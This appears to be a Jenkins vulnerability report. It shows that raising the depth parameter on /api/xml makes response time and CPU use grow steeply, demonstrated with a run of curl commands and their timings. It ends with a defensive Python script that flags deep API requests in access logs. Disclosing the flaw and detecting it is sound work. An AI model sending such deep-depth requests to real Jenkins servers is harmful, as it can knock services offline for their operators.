Jenkins seems vulnerable to denial of service attacks when exploring /api/xml?depth=XXX. For instance, taking a public internet Jenkins instance and executing:
┬─[saamorim@saamorim-vbox:~]─[08:47:17]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=0"
time_total: 0,018878
┬─[saamorim@saamorim-vbox:~]─[08:47:36]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=1"
time_total: 0,021458
┬─[saamorim@saamorim-vbox:~]─[08:47:38]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=2"
time_total: 0,094432
┬─[saamorim@saamorim-vbox:~]─[08:47:39]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=3"
time_total: 0,124732
┬─[saamorim@saamorim-vbox:~]─[08:47:40]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=4"
time_total: 0,439020
┬─[saamorim@saamorim-vbox:~]─[08:47:42]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=5"
time_total: 1,279623
┬─[saamorim@saamorim-vbox:~]─[08:47:44]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=6"
time_total: 2,344852
┬─[saamorim@saamorim-vbox:~]─[08:47:48]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=7"
time_total: 7,749517
┬─[saamorim@saamorim-vbox:~]─[08:47:59]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins.local/api/xml?depth=8"
time_total: 25,973226
┬─[saamorim@saamorim-vbox:~]─[08:48:27]
╰─>$ curl -k -w "@curl-format.txt" -o /dev/null -s "https://jenkins..local/api/xml?depth=10"
time_total: 161,02
Not only does the response time increase, but CPU usage increases as well. This is the CPU graph of a depth=10 request:
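From the defender's side, the pattern above (response time growing steeply with the depth parameter) is easy to spot in a reverse-proxy access log. The following is an added example, not code from the Jenkins project or from this report: it parses constructed combined-format log lines, extracts the depth requested on the remote-API endpoints (/api/xml, /api/json, /api/python) and counts, per client, requests above an assumed threshold MAX_DEPTH.

```python
"""Flag Jenkins remote-API requests with a large ?depth= value in access logs.

Added example (not from the Jenkins issue): the log lines below are
constructed, and the MAX_DEPTH threshold is an assumption for illustration.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Assumed policy: a depth above this is treated as suspicious on /api endpoints.
MAX_DEPTH = 3

# Combined/common log format: client, timestamp, quoted request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample access log (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:08:47:17 +0000] "GET /api/xml?depth=0 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2024:08:47:40 +0000] "GET /api/xml?depth=4 HTTP/1.1" 200 81920
203.0.113.7 - - [10/Mar/2024:08:48:27 +0000] "GET /api/xml?depth=10 HTTP/1.1" 200 9437184
198.51.100.2 - - [10/Mar/2024:08:50:01 +0000] "GET /job/build/api/json?depth=2&tree=name HTTP/1.1" 200 2048
198.51.100.2 - - [10/Mar/2024:08:50:05 +0000] "GET /job/build/api/json?depth=8 HTTP/1.1" 200 4194304
192.0.2.9 - - [10/Mar/2024:08:51:00 +0000] "GET /api/xml?depth=abc HTTP/1.1" 400 512
192.0.2.9 - - [10/Mar/2024:08:51:02 +0000] "GET /static/logo.png HTTP/1.1" 200 1024
"""


def api_depth(target):
    """Return the requested depth for a Jenkins remote-API path, else None.

    A missing or non-numeric depth counts as 0, the Jenkins default.
    """
    parts = urlsplit(target)
    if not re.search(r"/api/(xml|json|python)$", parts.path):
        return None
    raw = parse_qs(parts.query).get("depth", ["0"])[0]
    return int(raw) if raw.isdigit() else 0


def deep_api_requests(log_text, max_depth=MAX_DEPTH):
    """Yield (client, target, depth) for API requests exceeding max_depth."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        depth = api_depth(m.group("target"))
        if depth is not None and depth > max_depth:
            yield m.group("client"), m.group("target"), depth


def offenders(log_text, max_depth=MAX_DEPTH):
    """Count flagged requests per client."""
    return Counter(client for client, _, _ in deep_api_requests(log_text, max_depth))


if __name__ == "__main__":
    for client, target, depth in deep_api_requests(SAMPLE_LOG):
        print(f"{client} requested {target} (depth={depth})")
    print(offenders(SAMPLE_LOG).most_common())
```

The same depth check can be placed in front of Jenkins as a reverse-proxy rule that rejects oversized depth values before they reach the application.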